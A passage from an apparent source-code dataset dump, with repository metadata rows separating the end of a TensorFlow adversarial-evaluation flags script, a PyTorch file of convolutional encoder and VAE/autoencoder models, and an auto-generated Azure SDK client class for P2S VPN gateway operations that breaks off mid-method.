flags.DEFINE_string('report_path', REPORT_PATH, 'Path to save to')
flags.DEFINE_integer('mc_batch_size', MC_BATCH_SIZE,
'Batch size for MaxConfidence')
flags.DEFINE_integer('batch_size', BATCH_SIZE,
'Batch size for most jobs')
flags.DEFINE_float('base_eps_iter', BASE_EPS_ITER,
'epsilon per iteration, if data were in [0, 1]')
flags.DEFINE_integer('save_advx', SAVE_ADVX,
'If True, saves the adversarial examples to the '
'filesystem.')
tf.app.run()
| 41.947917 | 79 | 0.732555 |
1893cc4397532c7c4826225e5c37feb6bd97a8ba | 4,102 | py | Python | conv64.py | DeuterCat/VAEAN | b369fc84a7ca2d062f60bb0d634e26be21c72fa2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | conv64.py | DeuterCat/VAEAN | b369fc84a7ca2d062f60bb0d634e26be21c72fa2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | conv64.py | DeuterCat/VAEAN | b369fc84a7ca2d062f60bb0d634e26be21c72fa2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | import torch
from torch import nn
class Conv64F(nn.Module):
def __init__(
self,
is_flatten=False,
is_feature=False,
leaky_relu=False,
negative_slope=0.2,
last_pool=True,
maxpool_last2=True,
):
super(Conv64F, self).__init__()
self.is_flatten = is_flatten
self.is_feature = is_feature
self.last_pool = last_pool
self.maxpool_last2 = maxpool_last2
if leaky_relu:
activation = nn.LeakyReLU(negative_slope=negative_slope, inplace=True)
else:
activation = nn.ReLU(inplace=True)
self.layer1 = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
activation,
nn.MaxPool2d(kernel_size=2, stride=2),
)
self.layer2 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
activation,
nn.MaxPool2d(kernel_size=2, stride=2),
)
self.layer3 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
activation,
)
self.layer3_maxpool = nn.MaxPool2d(kernel_size=2, stride=2)
self.layer4 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
activation,
)
self.layer4_pool = nn.MaxPool2d(kernel_size=2, stride=2)
def forward(self, x):
out1 = self.layer1(x)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
if self.maxpool_last2:
out3 = self.layer3_maxpool(out3) # for some methods(relation net etc.)
out4 = self.layer4(out3)
if self.last_pool:
out4 = self.layer4_pool(out4)
if self.is_flatten:
out4 = out4.view(out4.size(0), -1)
if self.is_feature:
return out1, out2, out3, out4
return out4
class SingleLinear(nn.Module):
def __init__(self):
super(SingleLinear, self).__init__()
self.stack = nn.Sequential(
nn.Linear(64*5*5, 64),
)
def forward(self, x):
output = self.stack(x)
return output
class ReparaDecoder(nn.Module):
def __init__(self):
super(ReparaDecoder, self).__init__()
self.mu = nn.Sequential(
nn.Linear(64*5*5, 10),
nn.LeakyReLU(inplace=True)
)
self.log_var = nn.Sequential(
nn.Linear(64*5*5, 10),
nn.LeakyReLU(inplace=True)
)
self.stack = nn.Sequential(
nn.Linear(10, 64),
nn.LeakyReLU(inplace=True),
nn.Linear(64, 256),
nn.LeakyReLU(inplace=True),
nn.Linear(256, 1024),
nn.LeakyReLU(inplace=True),
nn.Linear(1024, 4096),
nn.LeakyReLU(inplace=True),
nn.Linear(4096, 84*84*3),
nn.Tanh()
)
def forward(self, x):
mu = self.mu(x)
log_var = self.log_var(x)
# reparameterization
std = torch.exp(0.5 * log_var)
eps = torch.randn_like(std)
z = eps*std + mu
out = self.stack(z)
return mu, log_var, out
class AutoEncoder(nn.Module):
def __init__(self):
super(AutoEncoder, self).__init__()
self.encoder = nn.Sequential(
# input is (nc) x 84*84
nn.Flatten(),
nn.Linear(84**2, 1024),
nn.LeakyReLU(inplace=True),
nn.Linear(1024, 256),
nn.LeakyReLU(inplace=True),
# output is (nc) x 256
)
self.decoder = nn.Sequential(
# input is (nc) x 256
nn.Linear(256, 1024),
nn.LeakyReLU(inplace=True),
nn.Linear(1024, 84**2),
nn.Tanh()
)
def forward(self, x):
out = self.encoder(x)
out = self.decoder(out)
out = out.view(3, 84, 84)
return out
| 27.530201 | 83 | 0.532667 |
5e1a120d90308fa97611261b3a007f1c096b0d7a | 46,859 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_p2_svpn_gateways_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 3 | 2020-06-23T02:25:27.000Z | 2021-09-07T18:48:11.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_p2_svpn_gateways_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 510 | 2019-07-17T16:11:19.000Z | 2021-08-02T08:38:32.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_p2_svpn_gateways_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 5 | 2019-09-04T12:51:37.000Z | 2020-09-16T07:28:40.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class P2SVpnGatewaysOperations(object):
"""P2SVpnGatewaysOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.P2SVpnGateway"
"""Retrieves the details of a virtual wan p2s vpn gateway.
:param resource_group_name: The resource group name of the P2SVpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: P2SVpnGateway, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
p2_s_vpn_gateway_parameters, # type: "_models.P2SVpnGateway"
**kwargs # type: Any
):
# type: (...) -> "_models.P2SVpnGateway"
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(p2_s_vpn_gateway_parameters, 'P2SVpnGateway')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
gateway_name, # type: str
p2_s_vpn_gateway_parameters, # type: "_models.P2SVpnGateway"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.P2SVpnGateway"]
"""Creates a virtual wan p2s vpn gateway if it doesn't exist else updates the existing gateway.
:param resource_group_name: The resource group name of the P2SVpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param p2_s_vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan p2s
vpn gateway.
:type p2_s_vpn_gateway_parameters: ~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either P2SVpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
p2_s_vpn_gateway_parameters=p2_s_vpn_gateway_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
gateway_name, # type: str
p2_s_vpn_gateway_parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.P2SVpnGateway"
"""Updates virtual wan p2s vpn gateway tags.
:param resource_group_name: The resource group name of the P2SVpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param p2_s_vpn_gateway_parameters: Parameters supplied to update a virtual wan p2s vpn gateway
tags.
:type p2_s_vpn_gateway_parameters: ~azure.mgmt.network.v2019_09_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: P2SVpnGateway, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(p2_s_vpn_gateway_parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a virtual wan p2s vpn gateway.
:param resource_group_name: The resource group name of the P2SVpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListP2SVpnGatewaysResult"]
"""Lists all the P2SVpnGateways in a resource group.
:param resource_group_name: The resource group name of the P2SVpnGateway.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListP2SVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ListP2SVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListP2SVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListP2SVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListP2SVpnGatewaysResult"]
"""Lists all the P2SVpnGateways in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListP2SVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ListP2SVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListP2SVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListP2SVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/p2svpnGateways'} # type: ignore
def _generate_vpn_profile_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
parameters, # type: "_models.P2SVpnProfileParameters"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.VpnProfileResponse"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.VpnProfileResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._generate_vpn_profile_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'P2SVpnProfileParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnProfileResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_generate_vpn_profile_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/generatevpnprofile'} # type: ignore
def begin_generate_vpn_profile(
self,
resource_group_name, # type: str
gateway_name, # type: str
parameters, # type: "_models.P2SVpnProfileParameters"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VpnProfileResponse"]
"""Generates VPN profile for P2S client of the P2SVpnGateway in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gateway_name: The name of the P2SVpnGateway.
:type gateway_name: str
:param parameters: Parameters supplied to the generate P2SVpnGateway VPN client package
operation.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.P2SVpnProfileParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VpnProfileResponse or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.VpnProfileResponse]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnProfileResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._generate_vpn_profile_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnProfileResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_generate_vpn_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/generatevpnprofile'} # type: ignore
def _get_p2_s_vpn_connection_health_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Optional["_models.P2SVpnGateway"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.P2SVpnGateway"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._get_p2_s_vpn_connection_health_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
